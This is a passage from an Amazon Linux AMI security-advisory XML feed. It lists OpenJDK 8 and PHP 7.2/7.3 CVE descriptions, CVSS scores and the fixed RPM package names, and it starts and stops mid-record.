date="2020-02-20 01:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-2659:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u241 and 8u231; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1791284: CVE-2020-2659 OpenJDK: Incomplete enforcement of maxDatagramSockets limit in DatagramChannelImpl (Networking, 8231795)
CVE-2020-2654:
Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1791217: CVE-2020-2654 OpenJDK: Excessive memory usage in OID processing in X.509 certificate parsing (Libraries, 8234037)
CVE-2020-2604:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS v3.0 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
99999:
1790944: CVE-2020-2604 OpenJDK: Serialization filter changes via jdk.serialFilter property modification (Serialization, 8231422)
CVE-2020-2601:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Java SE, Java SE Embedded. While the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N).
99999:
1790570: CVE-2020-2601 OpenJDK: Use of unsafe RSA-MD5 checksum in Kerberos TGS (Security, 8229951)
CVE-2020-2593:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
99999:
1790884: CVE-2020-2593 OpenJDK: Incorrect isBuiltinStreamHandler check causing URL normalization issues (Networking, 8228548)
CVE-2020-2590:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
99999:
1790556: CVE-2020-2590 OpenJDK: Improper checks of SASL message properties in GssKrb5Base (Security, 8226352)
CVE-2020-2583:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1790444: CVE-2020-2583 OpenJDK: Incorrect exception processing during deserialization in BeanContextSupport (Serialization, 8224909)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2583" title="" id="CVE-2020-2583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2590" title="" id="CVE-2020-2590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2593" title="" id="CVE-2020-2593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2601" title="" id="CVE-2020-2601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2604" title="" id="CVE-2020-2604" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2654" title="" id="CVE-2020-2654" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2659" title="" id="CVE-2020-2659" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.242.b08-0.50.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.242.b08-0.50.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.242.b08-0.50.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.242.b08-0.50.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.242.b08-0.50.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.242.b08-0.50.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.242.b08-0.50.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.242.b08-0.50.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.242.b08-0.50.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.242.b08-0.50.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.242.b08-0.50.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.242.b08-0.50.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.242.b08-0.50.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.242.b08-0.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1346</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1346: medium priority package update for php72</title><issued date="2020-02-24 21:41:00" /><updated date="2020-02-27 18:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7060:
When using certain mbstring functions to convert multibyte encodings, in PHP versions 7.2.x below 7.2.27, 7.3.x below 7.3.14 and 7.4.x below 7.4.2 it is possible to supply data that will cause function mbfl_filt_conv_big5_wchar to read past the allocated buffer. This may lead to information disclosure or crash.
1797779: CVE-2020-7060 php: Global buffer-overflow in mbfl_filt_conv_big5_wchar function
CVE-2020-7059:
When using fgetss() function to read data with stripping tags, in PHP versions 7.2.x below 7.2.27, 7.3.x below 7.3.14 and 7.4.x below 7.4.2 it is possible to supply data that will cause this function to read past the allocated buffer. This may lead to information disclosure or crash.
1797776: CVE-2020-7059 php: Out of bounds read in php_strip_tags_ex
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7059" title="" id="CVE-2020-7059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7060" title="" id="CVE-2020-7060" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.27-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1347</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1347: medium priority package update for php73</title><issued date="2020-02-24 21:41:00" /><updated date="2020-02-27 18:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7060:
When using certain mbstring functions to convert multibyte encodings, in PHP versions 7.2.x below 7.2.27, 7.3.x below 7.3.14 and 7.4.x below 7.4.2 it is possible to supply data that will cause function mbfl_filt_conv_big5_wchar to read past the allocated buffer. This may lead to information disclosure or crash.
1797779: CVE-2020-7060 php: Global buffer-overflow in mbfl_filt_conv_big5_wchar function
CVE-2020-7059:
When using fgetss() function to read data with stripping tags, in PHP versions 7.2.x below 7.2.27, 7.3.x below 7.3.14 and 7.4.x below 7.4.2 it is possible to supply data that will cause this function to read past the allocated buffer. This may lead to information disclosure or crash.
1797776: CVE-2020-7059 php: Out of bounds read in php_strip_tags_ex
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7059" title="" id="CVE-2020-7059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7060" title="" id="CVE-2020-7060" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php73-mysqlnd" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" 